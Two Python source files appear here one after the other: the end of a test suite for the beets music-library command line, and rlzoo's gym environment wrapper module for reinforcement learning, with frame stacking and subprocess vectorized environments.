# cli_config_path_2 = os.path.join(self.temp_dir, b'config_2.yaml')
#
# with open(cli_config_path_1, 'w') as file:
# file.write('first: value')
#
# with open(cli_config_path_2, 'w') as file:
# file.write('second: value')
#
# self.run_command('--config', cli_config_path_1,
# '--config', cli_config_path_2, 'test', lib=None)
# self.assertEqual(config['first'].get(), 'value')
# self.assertEqual(config['second'].get(), 'value')
#
# @unittest.skip('Difficult to implement with optparse')
# def test_multiple_cli_config_overwrite(self):
# cli_config_path = os.path.join(self.temp_dir, b'config.yaml')
# cli_overwrite_config_path = os.path.join(self.temp_dir,
# b'overwrite_config.yaml')
#
# with open(cli_config_path, 'w') as file:
# file.write('anoption: value')
#
# with open(cli_overwrite_config_path, 'w') as file:
# file.write('anoption: overwrite')
#
# self.run_command('--config', cli_config_path,
# '--config', cli_overwrite_config_path, 'test')
# self.assertEqual(config['anoption'].get(), 'cli overwrite')
def test_cli_config_paths_resolve_relative_to_user_dir(self):
cli_config_path = os.path.join(self.temp_dir, b'config.yaml')
with open(cli_config_path, 'w') as file:
file.write('library: beets.db\n')
file.write('statefile: state')
self.run_command('--config', cli_config_path, 'test', lib=None)
self.assert_equal_path(
util.bytestring_path(config['library'].as_filename()),
os.path.join(self.user_config_dir, b'beets.db')
)
self.assert_equal_path(
util.bytestring_path(config['statefile'].as_filename()),
os.path.join(self.user_config_dir, b'state')
)
def test_cli_config_paths_resolve_relative_to_beetsdir(self):
os.environ['BEETSDIR'] = util.py3_path(self.beetsdir)
cli_config_path = os.path.join(self.temp_dir, b'config.yaml')
with open(cli_config_path, 'w') as file:
file.write('library: beets.db\n')
file.write('statefile: state')
self.run_command('--config', cli_config_path, 'test', lib=None)
self.assert_equal_path(
util.bytestring_path(config['library'].as_filename()),
os.path.join(self.beetsdir, b'beets.db')
)
self.assert_equal_path(
util.bytestring_path(config['statefile'].as_filename()),
os.path.join(self.beetsdir, b'state')
)
def test_command_line_option_relative_to_working_dir(self):
os.chdir(self.temp_dir)
self.run_command('--library', 'foo.db', 'test', lib=None)
self.assert_equal_path(config['library'].as_filename(),
os.path.join(os.getcwd(), 'foo.db'))
def test_cli_config_file_loads_plugin_commands(self):
cli_config_path = os.path.join(self.temp_dir, b'config.yaml')
with open(cli_config_path, 'w') as file:
file.write('pluginpath: %s\n' % _common.PLUGINPATH)
file.write('plugins: test')
self.run_command('--config', cli_config_path, 'plugin', lib=None)
self.assertTrue(plugins.find_plugins()[0].is_test_plugin)
def test_beetsdir_config(self):
os.environ['BEETSDIR'] = util.py3_path(self.beetsdir)
env_config_path = os.path.join(self.beetsdir, b'config.yaml')
with open(env_config_path, 'w') as file:
file.write('anoption: overwrite')
config.read()
self.assertEqual(config['anoption'].get(), 'overwrite')
def test_beetsdir_points_to_file_error(self):
beetsdir = os.path.join(self.temp_dir, b'beetsfile')
open(beetsdir, 'a').close()
os.environ['BEETSDIR'] = util.py3_path(beetsdir)
self.assertRaises(ConfigError, self.run_command, 'test')
def test_beetsdir_config_does_not_load_default_user_config(self):
os.environ['BEETSDIR'] = util.py3_path(self.beetsdir)
with open(self.user_config_path, 'w') as file:
file.write('anoption: value')
config.read()
self.assertFalse(config['anoption'].exists())
def test_default_config_paths_resolve_relative_to_beetsdir(self):
os.environ['BEETSDIR'] = util.py3_path(self.beetsdir)
config.read()
self.assert_equal_path(
util.bytestring_path(config['library'].as_filename()),
os.path.join(self.beetsdir, b'library.db')
)
self.assert_equal_path(
util.bytestring_path(config['statefile'].as_filename()),
os.path.join(self.beetsdir, b'state.pickle')
)
def test_beetsdir_config_paths_resolve_relative_to_beetsdir(self):
os.environ['BEETSDIR'] = util.py3_path(self.beetsdir)
env_config_path = os.path.join(self.beetsdir, b'config.yaml')
with open(env_config_path, 'w') as file:
file.write('library: beets.db\n')
file.write('statefile: state')
config.read()
self.assert_equal_path(
util.bytestring_path(config['library'].as_filename()),
os.path.join(self.beetsdir, b'beets.db')
)
self.assert_equal_path(
util.bytestring_path(config['statefile'].as_filename()),
os.path.join(self.beetsdir, b'state')
)
class ShowModelChangeTest(_common.TestCase):
def setUp(self):
super(ShowModelChangeTest, self).setUp()
self.io.install()
self.a = _common.item()
self.b = _common.item()
self.a.path = self.b.path
def _show(self, **kwargs):
change = ui.show_model_changes(self.a, self.b, **kwargs)
out = self.io.getoutput()
return change, out
def test_identical(self):
change, out = self._show()
self.assertFalse(change)
self.assertEqual(out, '')
def test_string_fixed_field_change(self):
self.b.title = 'x'
change, out = self._show()
self.assertTrue(change)
self.assertTrue(u'title' in out)
def test_int_fixed_field_change(self):
self.b.track = 9
change, out = self._show()
self.assertTrue(change)
self.assertTrue(u'track' in out)
def test_floats_close_to_identical(self):
self.a.length = 1.00001
self.b.length = 1.00005
change, out = self._show()
self.assertFalse(change)
self.assertEqual(out, u'')
def test_floats_different(self):
self.a.length = 1.00001
self.b.length = 2.00001
change, out = self._show()
self.assertTrue(change)
self.assertTrue(u'length' in out)
def test_both_values_shown(self):
self.a.title = u'foo'
self.b.title = u'bar'
change, out = self._show()
self.assertTrue(u'foo' in out)
self.assertTrue(u'bar' in out)
class ShowChangeTest(_common.TestCase):
def setUp(self):
super(ShowChangeTest, self).setUp()
self.io.install()
self.items = [_common.item()]
self.items[0].track = 1
self.items[0].path = b'/path/to/file.mp3'
self.info = autotag.AlbumInfo(
u'the album', u'album id', u'the artist', u'artist id', [
autotag.TrackInfo(u'the title', u'track id', index=1)
]
)
def _show_change(self, items=None, info=None,
cur_artist=u'the artist', cur_album=u'the album',
dist=0.1):
"""Return an unicode string representing the changes"""
items = items or self.items
info = info or self.info
mapping = dict(zip(items, info.tracks))
config['ui']['color'] = False
album_dist = distance(items, info, mapping)
album_dist._penalties = {'album': [dist]}
commands.show_change(
cur_artist,
cur_album,
autotag.AlbumMatch(album_dist, info, mapping, set(), set()),
)
# FIXME decoding shouldn't be done here
return util.text_string(self.io.getoutput().lower())
def test_null_change(self):
msg = self._show_change()
self.assertTrue('similarity: 90' in msg)
self.assertTrue('tagging:' in msg)
def test_album_data_change(self):
msg = self._show_change(cur_artist='another artist',
cur_album='another album')
self.assertTrue('correcting tags from:' in msg)
def test_item_data_change(self):
self.items[0].title = u'different'
msg = self._show_change()
self.assertTrue('different -> the title' in msg)
def test_item_data_change_with_unicode(self):
self.items[0].title = u'caf\xe9'
msg = self._show_change()
self.assertTrue(u'caf\xe9 -> the title' in msg)
def test_album_data_change_with_unicode(self):
msg = self._show_change(cur_artist=u'caf\xe9',
cur_album=u'another album')
self.assertTrue(u'correcting tags from:' in msg)
def test_item_data_change_title_missing(self):
self.items[0].title = u''
msg = re.sub(r' +', ' ', self._show_change())
self.assertTrue(u'file.mp3 -> the title' in msg)
def test_item_data_change_title_missing_with_unicode_filename(self):
self.items[0].title = u''
self.items[0].path = u'/path/to/caf\xe9.mp3'.encode('utf-8')
msg = re.sub(r' +', ' ', self._show_change())
self.assertTrue(u'caf\xe9.mp3 -> the title' in msg or
u'caf.mp3 ->' in msg)
@patch('beets.library.Item.try_filesize', Mock(return_value=987))
class SummarizeItemsTest(_common.TestCase):
def setUp(self):
super(SummarizeItemsTest, self).setUp()
item = library.Item()
item.bitrate = 4321
item.length = 10 * 60 + 54
item.format = "F"
self.item = item
def test_summarize_item(self):
summary = commands.summarize_items([], True)
self.assertEqual(summary, u"")
summary = commands.summarize_items([self.item], True)
self.assertEqual(summary, u"F, 4kbps, 10:54, 987.0 B")
def test_summarize_items(self):
summary = commands.summarize_items([], False)
self.assertEqual(summary, u"0 items")
summary = commands.summarize_items([self.item], False)
self.assertEqual(summary, u"1 items, F, 4kbps, 10:54, 987.0 B")
i2 = deepcopy(self.item)
summary = commands.summarize_items([self.item, i2], False)
self.assertEqual(summary, u"2 items, F, 4kbps, 21:48, 1.9 KiB")
i2.format = "G"
summary = commands.summarize_items([self.item, i2], False)
self.assertEqual(summary, u"2 items, F 1, G 1, 4kbps, 21:48, 1.9 KiB")
summary = commands.summarize_items([self.item, i2, i2], False)
self.assertEqual(summary, u"3 items, G 2, F 1, 4kbps, 32:42, 2.9 KiB")
class PathFormatTest(_common.TestCase):
def test_custom_paths_prepend(self):
default_formats = ui.get_path_formats()
config['paths'] = {u'foo': u'bar'}
pf = ui.get_path_formats()
key, tmpl = pf[0]
self.assertEqual(key, u'foo')
self.assertEqual(tmpl.original, u'bar')
self.assertEqual(pf[1:], default_formats)
@_common.slow_test()
class PluginTest(_common.TestCase, TestHelper):
def test_plugin_command_from_pluginpath(self):
config['pluginpath'] = [_common.PLUGINPATH]
config['plugins'] = ['test']
self.run_command('test', lib=None)
@_common.slow_test()
class CompletionTest(_common.TestCase, TestHelper):
def test_completion(self):
# Load plugin commands
config['pluginpath'] = [_common.PLUGINPATH]
config['plugins'] = ['test']
# Do not load any other bash completion scripts on the system.
env = dict(os.environ)
env['BASH_COMPLETION_DIR'] = os.devnull
env['BASH_COMPLETION_COMPAT_DIR'] = os.devnull
# Open a `bash` process to run the tests in. We'll pipe in bash
# commands via stdin.
cmd = os.environ.get('BEETS_TEST_SHELL', '/bin/bash --norc').split()
if not has_program(cmd[0]):
self.skipTest(u'bash not available')
tester = subprocess.Popen(cmd, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, env=env)
# Load bash_completion library.
for path in commands.BASH_COMPLETION_PATHS:
if os.path.exists(util.syspath(path)):
bash_completion = path
break
else:
self.skipTest(u'bash-completion script not found')
try:
with open(util.syspath(bash_completion), 'rb') as f:
tester.stdin.writelines(f)
except IOError:
self.skipTest(u'could not read bash-completion script')
# Load completion script.
self.io.install()
self.run_command('completion', lib=None)
completion_script = self.io.getoutput().encode('utf-8')
self.io.restore()
tester.stdin.writelines(completion_script.splitlines(True))
# Load test suite.
test_script_name = os.path.join(_common.RSRC, b'test_completion.sh')
with open(test_script_name, 'rb') as test_script_file:
tester.stdin.writelines(test_script_file)
out, err = tester.communicate()
if tester.returncode != 0 or out != b'completion tests passed\n':
print(out.decode('utf-8'))
self.fail(u'test/test_completion.sh did not execute properly')
class CommonOptionsParserCliTest(unittest.TestCase, TestHelper):
"""Test CommonOptionsParser and formatting LibModel formatting on 'list'
command.
"""
def setUp(self):
self.setup_beets()
self.lib = library.Library(':memory:')
self.item = _common.item()
self.item.path = b'xxx/yyy'
self.lib.add(self.item)
self.lib.add_album([self.item])
def tearDown(self):
self.teardown_beets()
def test_base(self):
l = self.run_with_output(u'ls')
self.assertEqual(l, u'the artist - the album - the title\n')
l = self.run_with_output(u'ls', u'-a')
self.assertEqual(l, u'the album artist - the album\n')
def test_path_option(self):
l = self.run_with_output(u'ls', u'-p')
self.assertEqual(l, u'xxx/yyy\n')
l = self.run_with_output(u'ls', u'-a', u'-p')
self.assertEqual(l, u'xxx\n')
def test_format_option(self):
l = self.run_with_output(u'ls', u'-f', u'$artist')
self.assertEqual(l, u'the artist\n')
l = self.run_with_output(u'ls', u'-a', u'-f', u'$albumartist')
self.assertEqual(l, u'the album artist\n')
def test_format_option_unicode(self):
l = self.run_with_output(b'ls', b'-f',
u'caf\xe9'.encode(util.arg_encoding()))
self.assertEqual(l, u'caf\xe9\n')
def test_root_format_option(self):
l = self.run_with_output(u'--format-item', u'$artist',
u'--format-album', u'foo', u'ls')
self.assertEqual(l, u'the artist\n')
l = self.run_with_output(u'--format-item', u'foo',
u'--format-album', u'$albumartist',
u'ls', u'-a')
self.assertEqual(l, u'the album artist\n')
def test_help(self):
l = self.run_with_output(u'help')
self.assertIn(u'Usage:', l)
l = self.run_with_output(u'help', u'list')
self.assertIn(u'Usage:', l)
with self.assertRaises(ui.UserError):
self.run_command(u'help', u'this.is.not.a.real.command')
def test_stats(self):
l = self.run_with_output(u'stats')
self.assertIn(u'Approximate total size:', l)
# # Need to have more realistic library setup for this to work
# l = self.run_with_output('stats', '-e')
# self.assertIn('Total size:', l)
def test_version(self):
l = self.run_with_output(u'version')
self.assertIn(u'Python version', l)
self.assertIn(u'no plugins loaded', l)
# # Need to have plugin loaded
# l = self.run_with_output('version')
# self.assertIn('plugins: ', l)
class CommonOptionsParserTest(unittest.TestCase, TestHelper):
def setUp(self):
self.setup_beets()
def tearDown(self):
self.teardown_beets()
def test_album_option(self):
parser = ui.CommonOptionsParser()
self.assertFalse(parser._album_flags)
parser.add_album_option()
self.assertTrue(bool(parser._album_flags))
self.assertEqual(parser.parse_args([]), ({'album': None}, []))
self.assertEqual(parser.parse_args([u'-a']), ({'album': True}, []))
self.assertEqual(parser.parse_args([u'--album']),
({'album': True}, []))
def test_path_option(self):
parser = ui.CommonOptionsParser()
parser.add_path_option()
self.assertFalse(parser._album_flags)
config['format_item'].set('$foo')
self.assertEqual(parser.parse_args([]), ({'path': None}, []))
self.assertEqual(config['format_item'].as_str(), u'$foo')
self.assertEqual(parser.parse_args([u'-p']),
({'path': True, 'format': u'$path'}, []))
self.assertEqual(parser.parse_args(['--path']),
({'path': True, 'format': u'$path'}, []))
self.assertEqual(config['format_item'].as_str(), u'$path')
self.assertEqual(config['format_album'].as_str(), u'$path')
def test_format_option(self):
parser = ui.CommonOptionsParser()
parser.add_format_option()
self.assertFalse(parser._album_flags)
config['format_item'].set('$foo')
self.assertEqual(parser.parse_args([]), ({'format': None}, []))
self.assertEqual(config['format_item'].as_str(), u'$foo')
self.assertEqual(parser.parse_args([u'-f', u'$bar']),
({'format': u'$bar'}, []))
self.assertEqual(parser.parse_args([u'--format', u'$baz']),
({'format': u'$baz'}, []))
self.assertEqual(config['format_item'].as_str(), u'$baz')
self.assertEqual(config['format_album'].as_str(), u'$baz')
def test_format_option_with_target(self):
with self.assertRaises(KeyError):
ui.CommonOptionsParser().add_format_option(target='thingy')
parser = ui.CommonOptionsParser()
parser.add_format_option(target='item')
config['format_item'].set('$item')
config['format_album'].set('$album')
self.assertEqual(parser.parse_args([u'-f', u'$bar']),
({'format': u'$bar'}, []))
self.assertEqual(config['format_item'].as_str(), u'$bar')
self.assertEqual(config['format_album'].as_str(), u'$album')
def test_format_option_with_album(self):
parser = ui.CommonOptionsParser()
parser.add_album_option()
parser.add_format_option()
config['format_item'].set('$item')
config['format_album'].set('$album')
parser.parse_args([u'-f', u'$bar'])
self.assertEqual(config['format_item'].as_str(), u'$bar')
self.assertEqual(config['format_album'].as_str(), u'$album')
parser.parse_args([u'-a', u'-f', u'$foo'])
self.assertEqual(config['format_item'].as_str(), u'$bar')
self.assertEqual(config['format_album'].as_str(), u'$foo')
parser.parse_args([u'-f', u'$foo2', u'-a'])
self.assertEqual(config['format_album'].as_str(), u'$foo2')
def test_add_all_common_options(self):
parser = ui.CommonOptionsParser()
parser.add_all_common_options()
self.assertEqual(parser.parse_args([]),
({'album': None, 'path': None, 'format': None}, []))
class EncodingTest(_common.TestCase):
"""Tests for the `terminal_encoding` config option and our
`_in_encoding` and `_out_encoding` utility functions.
"""
def out_encoding_overridden(self):
config['terminal_encoding'] = 'fake_encoding'
self.assertEqual(ui._out_encoding(), 'fake_encoding')
def in_encoding_overridden(self):
config['terminal_encoding'] = 'fake_encoding'
self.assertEqual(ui._in_encoding(), 'fake_encoding')
def out_encoding_default_utf8(self):
with patch('sys.stdout') as stdout:
stdout.encoding = None
self.assertEqual(ui._out_encoding(), 'utf-8')
def in_encoding_default_utf8(self):
with patch('sys.stdin') as stdin:
stdin.encoding = None
self.assertEqual(ui._in_encoding(), 'utf-8')
def suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
the-stack_106_14774
|
"""Env wrappers
Most common wrappers can be checked from following links for usage:
`https://pypi.org/project/gym-vec-env`
`https://github.com/openai/baselines/blob/master/baselines/common/wrappers.py`
"""
from collections import deque
from functools import partial
from multiprocessing import Pipe, Process, cpu_count
from sys import platform
import cv2
import gym
import numpy as np
from gym import spaces
from gym.wrappers import FlattenDictWrapper
from rlzoo.common.env_list import get_envlist
__all__ = (
'build_env', # build env
'TimeLimit', # Time limit wrapper
'NoopResetEnv', # Run random number of no-ops on reset
'FireResetEnv', # Reset wrapper for envs with fire action
'EpisodicLifeEnv', # end-of-life == end-of-episode wrapper
'MaxAndSkipEnv', # skip frame wrapper
'ClipRewardEnv', # clip reward wrapper
'WarpFrame', # warp observation wrapper
'FrameStack', # stack frame wrapper
'LazyFrames', # lazy store wrapper
'RewardShaping', # reward shaping
'SubprocVecEnv', # vectorized env wrapper
'VecFrameStack', # stack frames in vectorized env
'Monitor', # Episode reward and length monitor
'NormalizedActions', # normalized action to actual space
'DmObsTrans', # translate observations in dm_control environments
)
cv2.ocl.setUseOpenCL(False)
def build_env(env_id, env_type, vectorized=False,
seed=0, reward_shaping=None, nenv=1, **kwargs):
"""
Build env based on options
:param env_id: (str) environment id
:param env_type: (str) atari, classic_control, box2d
    :param vectorized: (bool) whether to sample in parallel
:param seed: (int) random seed for env
:param reward_shaping: (callable) callable function for reward shaping
:param nenv: (int) how many processes will be used in sampling
:param kwargs: (dict)
:param max_episode_steps: (int) the maximum episode steps
"""
nenv = nenv or cpu_count() // (1 + (platform == 'darwin'))
stack = env_type == 'atari'
if nenv > 1:
if vectorized:
env = _make_vec_env(env_id, env_type, nenv, seed,
reward_shaping, stack, **kwargs)
else:
env = []
for _ in range(nenv):
single_env = _make_env(env_id, env_type, seed,
reward_shaping, stack, **kwargs)
env.append(single_env) # get env as a list of same single env
else:
env = _make_env(env_id, env_type, seed,
reward_shaping, stack, **kwargs)
return env
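# Illustrative usage of build_env (a sketch, not taken from the original file; the env
# id 'CartPole-v1', the reward scale and the step limit below are assumptions). Kept as
# comments so that importing this module stays free of side effects:
#
#   env = build_env('CartPole-v1', 'classic_control', seed=0,
#                   reward_shaping=lambda r: 0.1 * r, max_episode_steps=200)
#   obs = env.reset()
#   obs, reward, done, info = env.step(env.action_space.sample())
#
# With nenv > 1 and vectorized=False the call returns a plain list of identically
# configured single envs; with vectorized=True it returns a SubprocVecEnv (see below).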
def check_name_in_list(env_id, env_type):
""" Check if env_id exists in the env_type list """
env_list = get_envlist(env_type)
if env_id not in env_list:
print('Env ID {:s} Not Found In {:s}!'.format(env_id, env_type))
else:
print('Env ID {:s} Exists!'.format(env_id))
def _make_env(env_id, env_type, seed, reward_shaping, frame_stack, **kwargs):
"""Make single env"""
check_name_in_list(env_id, env_type) # check existence of env_id in env_type
if env_type == 'atari':
env = gym.make(env_id)
env = NoopResetEnv(env, noop_max=30)
if 'NoFrameskip' in env.spec.id:
env = MaxAndSkipEnv(env, skip=4)
env = Monitor(env)
# deepmind wrap
env = EpisodicLifeEnv(env)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = WarpFrame(env)
env = ClipRewardEnv(env)
if frame_stack:
env = FrameStack(env, 4)
elif env_type in ['classic_control', 'box2d', 'mujoco']:
env = gym.make(env_id).unwrapped
max_episode_steps = kwargs.get('max_episode_steps')
if max_episode_steps is not None:
env = TimeLimit(env.unwrapped, max_episode_steps)
env = Monitor(env)
elif env_type == 'robotics':
env = gym.make(env_id)
env = FlattenDictWrapper(env, ['observation', 'desired_goal'])
env = Monitor(env, info_keywords=('is_success',))
elif env_type == 'dm_control':
env = gym.make('dm2gym:' + env_id, environment_kwargs={'flat_observation': True})
env = DmObsTrans(env)
elif env_type == 'rlbench':
from rlzoo.common.build_rlbench_env import RLBenchEnv
state_type = kwargs.get('state_type')
env = RLBenchEnv(env_id) if state_type is None else RLBenchEnv(env_id, state_type)
else:
raise NotImplementedError
if reward_shaping is not None:
if callable(reward_shaping):
env = RewardShaping(env, reward_shaping)
else:
raise ValueError('reward_shaping parameter must be callable')
env.seed(seed)
return env
def _make_vec_env(env_id, env_type, nenv, seed,
reward_shaping, frame_stack, **kwargs):
"""Make vectorized env"""
env = SubprocVecEnv([partial(
_make_env, env_id, env_type, seed + i, reward_shaping, False, **kwargs
) for i in range(nenv)])
if frame_stack:
env = VecFrameStack(env, 4)
return env
class DmObsTrans(gym.Wrapper):
""" Observation process for DeepMind Control Suite environments """
def __init__(self, env):
self.env = env
super(DmObsTrans, self).__init__(env)
self.__need_trans = False
if isinstance(self.observation_space, gym.spaces.dict.Dict):
self.observation_space = self.observation_space['observations']
self.__need_trans = True
def step(self, ac):
observation, reward, done, info = self.env.step(ac)
if self.__need_trans:
observation = observation['observations']
return observation, reward, done, info
def reset(self, **kwargs):
observation = self.env.reset(**kwargs)
if self.__need_trans:
observation = observation['observations']
return observation
class TimeLimit(gym.Wrapper):
def __init__(self, env, max_episode_steps=None):
self.env = env
super(TimeLimit, self).__init__(env)
self._max_episode_steps = max_episode_steps
self._elapsed_steps = 0
def step(self, ac):
observation, reward, done, info = self.env.step(ac)
self._elapsed_steps += 1
if self._elapsed_steps >= self._max_episode_steps:
done = True
info['TimeLimit.truncated'] = True
return observation, reward, done, info
def reset(self, **kwargs):
self._elapsed_steps = 0
return self.env.reset(**kwargs)
class NoopResetEnv(gym.Wrapper):
def __init__(self, env, noop_max=30):
"""Sample initial states by taking random number of no-ops on reset.
No-op is assumed to be action 0.
"""
super(NoopResetEnv, self).__init__(env)
self.noop_max = noop_max
self.override_num_noops = None
self.noop_action = 0
assert env.unwrapped.get_action_meanings()[0] == 'NOOP'
def reset(self, **kwargs):
""" Do no-op action for a number of steps in [1, noop_max]."""
self.env.reset(**kwargs)
if self.override_num_noops is not None:
noops = self.override_num_noops
else:
noops = self.unwrapped.np_random.randint(1, self.noop_max + 1)
assert noops > 0
obs = None
for _ in range(noops):
obs, _, done, _ = self.env.step(self.noop_action)
if done:
obs = self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class FireResetEnv(gym.Wrapper):
def __init__(self, env):
"""Take action on reset for environments that are fixed until firing."""
super(FireResetEnv, self).__init__(env)
assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
assert len(env.unwrapped.get_action_meanings()) >= 3
def reset(self, **kwargs):
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(1)
if done:
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(2)
if done:
self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class EpisodicLifeEnv(gym.Wrapper):
def __init__(self, env):
"""Make end-of-life == end-of-episode, but only reset on true game over.
Done by DeepMind for the DQN and co. since it helps value estimation.
"""
super(EpisodicLifeEnv, self).__init__(env)
self.lives = 0
self.was_real_done = True
def step(self, action):
obs, reward, done, info = self.env.step(action)
self.was_real_done = done
# check current lives, make loss of life terminal,
# then update lives to handle bonus lives
lives = self.env.unwrapped.ale.lives()
if 0 < lives < self.lives:
# for Qbert sometimes we stay in lives == 0 condition for a few
# frames so it's important to keep lives > 0, so that we only reset
# once the environment advertises done.
done = True
self.lives = lives
return obs, reward, done, info
def reset(self, **kwargs):
"""Reset only when lives are exhausted.
This way all states are still reachable even though lives are episodic,
and the learner need not know about any of this behind-the-scenes.
"""
if self.was_real_done:
obs = self.env.reset(**kwargs)
else:
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
self.lives = self.env.unwrapped.ale.lives()
return obs
class MaxAndSkipEnv(gym.Wrapper):
def __init__(self, env, skip=4):
"""Return only every `skip`-th frame"""
super(MaxAndSkipEnv, self).__init__(env)
# most recent raw observations (for max pooling across time steps)
shape = (2,) + env.observation_space.shape
self._obs_buffer = np.zeros(shape, dtype=np.uint8)
self._skip = skip
def step(self, action):
"""Repeat action, sum reward, and max over last observations."""
total_reward = 0.0
done = info = None
for i in range(self._skip):
obs, reward, done, info = self.env.step(action)
if i == self._skip - 2:
self._obs_buffer[0] = obs
if i == self._skip - 1:
self._obs_buffer[1] = obs
total_reward += reward
if done:
break
# Note that the observation on the done=True frame doesn't matter
max_frame = self._obs_buffer.max(axis=0)
return max_frame, total_reward, done, info
def reset(self, **kwargs):
return self.env.reset(**kwargs)
class ClipRewardEnv(gym.RewardWrapper):
def __init__(self, env):
super(ClipRewardEnv, self).__init__(env)
def reward(self, reward):
"""Bin reward to {+1, 0, -1} by its sign."""
return np.sign(reward)
class WarpFrame(gym.ObservationWrapper):
def __init__(self, env, width=84, height=84, grayscale=True):
"""Warp frames to 84x84 as done in the Nature paper and later work."""
super(WarpFrame, self).__init__(env)
self.width = width
self.height = height
self.grayscale = grayscale
shape = (self.height, self.width, 1 if self.grayscale else 3)
self.observation_space = spaces.Box(low=0, high=255, shape=shape, dtype=np.uint8)
def observation(self, frame):
if self.grayscale:
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
size = (self.width, self.height)
frame = cv2.resize(frame, size, interpolation=cv2.INTER_AREA)
if self.grayscale:
frame = np.expand_dims(frame, -1)
return frame
class FrameStack(gym.Wrapper):
def __init__(self, env, k):
"""Stack k last frames.
Returns lazy array, which is much more memory efficient.
See Also `LazyFrames`
"""
super(FrameStack, self).__init__(env)
self.k = k
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
shape = shp[:-1] + (shp[-1] * k,)
self.observation_space = spaces.Box(low=0, high=255, shape=shape, dtype=env.observation_space.dtype)
def reset(self):
ob = self.env.reset()
for _ in range(self.k):
self.frames.append(ob)
return np.asarray(self._get_ob())
def step(self, action):
ob, reward, done, info = self.env.step(action)
self.frames.append(ob)
return np.asarray(self._get_ob()), reward, done, info
def _get_ob(self):
assert len(self.frames) == self.k
return LazyFrames(list(self.frames))
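# For example (assuming the default 84x84 grayscale WarpFrame output), FrameStack(env, 4)
# turns an observation_space of shape (84, 84, 1) into (84, 84, 4); the last k frames are
# held in a LazyFrames object and materialized via np.asarray on every reset()/step().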
class LazyFrames(object):
def __init__(self, frames):
"""This object ensures that common frames between the observations are
only stored once. It exists purely to optimize memory usage which can be
huge for DQN's 1M frames replay buffers.
This object should only be converted to numpy array before being passed
to the model. You'd not believe how complex the previous solution was.
"""
self._frames = frames
self._out = None
def _force(self):
if self._out is None:
self._out = np.concatenate(self._frames, axis=-1)
self._frames = None
return self._out
def __array__(self, dtype=None):
out = self._force()
if dtype is not None:
out = out.astype(dtype)
return out
def __len__(self):
return len(self._force())
def __getitem__(self, i):
return self._force()[i]
class RewardShaping(gym.RewardWrapper):
"""Shaping the reward
For reward scale, func can be `lambda r: r * scale`
"""
def __init__(self, env, func):
super(RewardShaping, self).__init__(env)
self.func = func
def reward(self, reward):
return self.func(reward)
class VecFrameStack(object):
def __init__(self, env, k):
self.env = env
self.k = k
self.action_space = env.action_space
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
shape = shp[:-1] + (shp[-1] * k,)
self.observation_space = spaces.Box(low=0, high=255, shape=shape, dtype=env.observation_space.dtype)
def reset(self):
ob = self.env.reset()
for _ in range(self.k):
self.frames.append(ob)
return np.asarray(self._get_ob())
def step(self, action):
ob, reward, done, info = self.env.step(action)
self.frames.append(ob)
return np.asarray(self._get_ob()), reward, done, info
def _get_ob(self):
assert len(self.frames) == self.k
return LazyFrames(list(self.frames))
def _worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.x()
while True:
cmd, data = remote.recv()
if cmd == 'step':
ob, reward, done, info = env.step(data)
if done:
ob = env.reset()
remote.send((ob, reward, done, info))
elif cmd == 'reset':
ob = env.reset()
remote.send(ob)
elif cmd == 'reset_task':
ob = env._reset_task()
remote.send(ob)
elif cmd == 'close':
remote.close()
break
elif cmd == 'get_spaces':
remote.send((env.observation_space, env.action_space))
else:
raise NotImplementedError
class CloudpickleWrapper(object):
"""
Uses cloudpickle to serialize contents
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
class SubprocVecEnv(object):
def __init__(self, env_fns):
"""
        env_fns: list of callables, each creating a gym environment to run in a subprocess
"""
self.num_envs = len(env_fns)
self.waiting = False
self.closed = False
nenvs = len(env_fns)
self.nenvs = nenvs
self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])
zipped_args = zip(self.work_remotes, self.remotes, env_fns)
self.ps = [
Process(target=_worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
for (work_remote, remote, env_fn) in zipped_args
]
for p in self.ps:
# if the main process crashes, we should not cause things to hang
p.daemon = True
p.start()
for remote in self.work_remotes:
remote.close()
self.remotes[0].send(('get_spaces', None))
observation_space, action_space = self.remotes[0].recv()
self.observation_space = observation_space
self.action_space = action_space
def _step_async(self, actions):
"""
Tell all the environments to start taking a step
with the given actions.
Call step_wait() to get the results of the step.
You should not call this if a step_async run is
already pending.
"""
for remote, action in zip(self.remotes, actions):
remote.send(('step', action))
self.waiting = True
def _step_wait(self):
"""
Wait for the step taken with step_async().
Returns (obs, rews, dones, infos):
- obs: an array of observations, or a tuple of
arrays of observations.
- rews: an array of rewards
- dones: an array of "episode done" booleans
- infos: a sequence of info objects
"""
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return np.stack(obs), np.stack(rews), np.stack(dones), infos
def reset(self):
"""
Reset all the environments and return an array of
observations, or a tuple of observation arrays.
If step_async is still doing work, that work will
be cancelled and step_wait() should not be called
until step_async() is invoked again.
"""
for remote in self.remotes:
remote.send(('reset', None))
return np.stack([remote.recv() for remote in self.remotes])
def _reset_task(self):
for remote in self.remotes:
remote.send(('reset_task', None))
return np.stack([remote.recv() for remote in self.remotes])
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(('close', None))
for p in self.ps:
p.join()
self.closed = True
def __len__(self):
return self.nenvs
def step(self, actions):
self._step_async(actions)
return self._step_wait()
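# Minimal sketch of driving SubprocVecEnv directly (illustrative only; 'CartPole-v1'
# is an assumed env id, and gym.make is used instead of _make_env for brevity):
#
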